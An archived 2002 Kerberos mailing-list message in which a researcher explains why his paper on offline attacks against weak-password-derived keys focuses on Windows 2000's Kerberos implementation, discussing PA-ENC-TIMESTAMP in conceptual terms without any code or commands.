Paper: Feasibility of attacking Windows 2000 Kerberos Passwords

Frank O'Dwyer fod at brd.ie
Wed Mar 6 15:41:51 EST 2002


"Nicolas Williams" <Nicolas.Williams at ubsw.com> wrote in message
news:20020306113507.D27171 at sm2p1386swk.wdr.com...
> Your paper is about the usage of keys derived from weak passwords in
> Kerberos V.  It is not specific to Windows 2000.

Maybe you think I should have written about the general problem, but I
didn't. You can if you like. What I did write about was whether this has any
practical significance in the concrete Kerberos implementation that the
majority of people will find themselves confronted with, i.e. W2K.

Since I wanted to write a practical paper that would raise awareness of this
issue in W2K, my paper concerns itself with the actual on-the-wire stuff in
W2K, the actual string2key and encryption methods etc., the concrete
Kerberos choices that were made in W2K. I don't mean to imply that these
choices were any worse than those of other implementations, the problem is
that they were no better.

I have already pointed out, here and in the paper, that the basic
vulnerability is not news, and not unique to the Microsoft implementation,
but stems from an old Kerberos V design flaw that has been imported into
W2K. And, so what? That fixes it, does it?

Cheers,
Frank.

> On Wed, Mar 06, 2002 at 03:55:41PM +0000, Frank O'Dwyer wrote:
> > "Nicolas Williams" <Nicolas.Williams at ubsw.com> wrote in message
> > news:20020306094804.C27171 at sm2p1386swk.wdr.com...
> > > You know it's not just Windows 2000 that uses PA-ENC-TIMESTAMP.
> > >
> > > So why the title?
> >
> > I couldn't see any reason to break with the tradition of naming the
paper
> > after what it is about, hence the title :)
> >
> > The paper is not about PA-ENC-TIMESTAMP, or other implementations of it,
> > it's about the feasibility of getting somewhere in a real-world
situation
> > against W2K Kerberos. It's not even exhaustive as far as that scope
goes.
> >
> > Obviously the attack does apply to, in fact has been derived from,
attacks
> > on other krb5 implementations using the timestamp with other encryption
> > methods. Actually I did not know for sure that W2K used
PA-ENC-TIMESTAMP, or
> > even if it used the standard AS protocol at all until I looked into it.
> >
> > Cheers,
> > Frank.







More information about the Kerberos mailing list